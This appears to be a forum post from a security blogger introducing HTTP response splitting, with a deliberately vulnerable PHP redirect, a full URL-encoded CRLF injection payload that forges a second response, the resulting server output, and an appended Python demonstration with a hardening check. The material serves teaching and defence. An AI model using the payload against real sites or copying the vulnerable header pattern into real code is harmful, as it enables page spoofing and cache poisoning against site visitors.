HTTP Response Splitting
Hey everyone, I'm a hacker, ethical hacker that is. I am into WebApp Security. I thought I'd share an article from my blog. I hope to share weekly or bi-weekly if you guys like it. Let me know if I should simplify. I tried to put it in code tags but the box is too small, hence too hard to read.
Note: This is just an introduction to the HTTP Response Splitting vulnerability.
HTTP response splitting is a relatively new web application vulnerability resulting from the failure of a web application or its development environment to properly sanitize input. HTTP response splitting attacks (from here on, HRS attacks) are generally found where a malicious user can inject unexpected characters into a value that is then used to form a 302 redirect, usually in the 'Location' or 'Set-Cookie' header. Basic HRS attacks work by injecting the CR (carriage return) and LF (line feed) sequence, normally written "\r\n". Let's dive right in and look at the following PHP code, which sets the Location header.
<?php
// Vulnerable on purpose: the redirectpage query parameter is concatenated
// into the header value without any validation of its characters.
header("Location: " . $_GET['redirectpage']);
?>
So by visiting the URL "http://www.loopback.biz?redirectpage=http://www.loopback.biz" you get the following 302 response from the server:
HTTP/1.1 302 Found\r\n
Date: Tue, 12 Apr 2005 21:00:28 GMT\r\n
Server: Apache/1.3.29 (Unix) mod_ssl/2.8.16 OpenSSL/0.9.7c\r\n
Location: http://www.loopback.biz\r\n <Note: This is the value of the redirectpage GET request>
Keep-Alive: timeout=15, max=100\r\n
Connection: Keep-Alive\r\n
Transfer-Encoding: chunked\r\n
Content-Type: text/html\r\n
\r\n
As noted, the redirectpage GET parameter is embedded in the Location response header. This is the basis of the HRS attack: by changing the value of redirectpage we control part of the response. The attack works by first terminating the current response and then shaping an additional response. Terminating the response is done by injecting the CRLF sequence. This is how it might be accomplished:
?redirectpage=anything%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Hacked</html>
As a result, the output sent by the web server might look like this:
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://loopback.biz/?redirectpage=anything
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19
<html>Hacked</html>
Followed by a bunch of garbage.
Here is what is going on:
1. A first HTTP response, which is a 302 (redirection) response.
2. A second HTTP response, which is a 200 response, with a body consisting of 19 bytes of HTML.
3. The bunch of garbage (everything beyond the end of the second response), which does not conform to the HTTP standard.
So when the malicious user splits the response, they send two requests: the first to the URL
/?redirectpage=anything%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Hacked</html>
and the second to the URL
/index.html
The target would believe that the first request is matched to the first response:
HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://loopback.biz/?redirectpage=anything
Content-Length: 0
And that the second request (to /index.html) is matched to the second response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19
<html>Hacked</html>
And by this, the attacker manages to fool the target into treating the injected 200 response as the content of /index.html.
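As an added example (not code from the original article), the following Python models the vulnerable header() call beside a hardened one and reads the resulting bytes the way a keep-alive client would, so the split into two responses becomes visible. The function names, the exact response layout and the sample inputs are assumptions constructed for the demonstration.

```python
import urllib.parse

# Constructed inputs: the benign value from the article and its split payload,
# URL-decoded as PHP would present them in $_GET['redirectpage'].
BENIGN = "http://www.loopback.biz"
SPLIT = urllib.parse.unquote(
    "anything%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
    "Content-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Hacked</html>"
)

def build_redirect_unsafe(redirectpage: str) -> bytes:
    """Mirror of the article's header("Location: " . $_GET[...]) call: the value
    goes into the header line verbatim, so a CRLF inside it ends the header and
    everything after it is sent on as further headers and body."""
    return (f"HTTP/1.1 302 Found\r\nLocation: {redirectpage}\r\n"
            "Content-Type: text/html\r\n\r\n").encode("latin-1")

def is_safe_header_value(value: str) -> bool:
    """Hardened check: no CR, LF or other control character in a header value
    (these are exactly the characters the split depends on)."""
    return not any(ord(c) < 0x20 or c == "\x7f" for c in value)

def build_redirect_safe(redirectpage: str) -> bytes:
    """Same response, but refuses any value that could terminate the header."""
    if not is_safe_header_value(redirectpage):
        raise ValueError("control character in Location value")
    return build_redirect_unsafe(redirectpage)

def split_responses(raw: bytes) -> list[bytes]:
    """Read the stream as a keep-alive HTTP/1.1 client does: parse the headers,
    take Content-Length bytes of body, then expect the next status line.
    Trailing bytes after the last well-formed response (the article's
    'garbage') are dropped. Returns one element per response seen."""
    out, pos = [], 0
    while raw.startswith(b"HTTP/1.", pos):
        hdr_end = raw.find(b"\r\n\r\n", pos)
        if hdr_end < 0:  # truncated response: take whatever is left
            out.append(raw[pos:])
            break
        length = 0
        for line in raw[pos:hdr_end].decode("latin-1").split("\r\n")[1:]:
            name, _, value = line.partition(":")
            if name.strip().lower() == "content-length":
                length = int(value.strip())
        end = hdr_end + 4 + length
        out.append(raw[pos:end])
        pos = end
    return out
```

Current PHP releases reject a header() value that contains a newline, but the same defect reappears wherever code assembles a header line by string concatenation, so the control-character check belongs in the application regardless of the runtime.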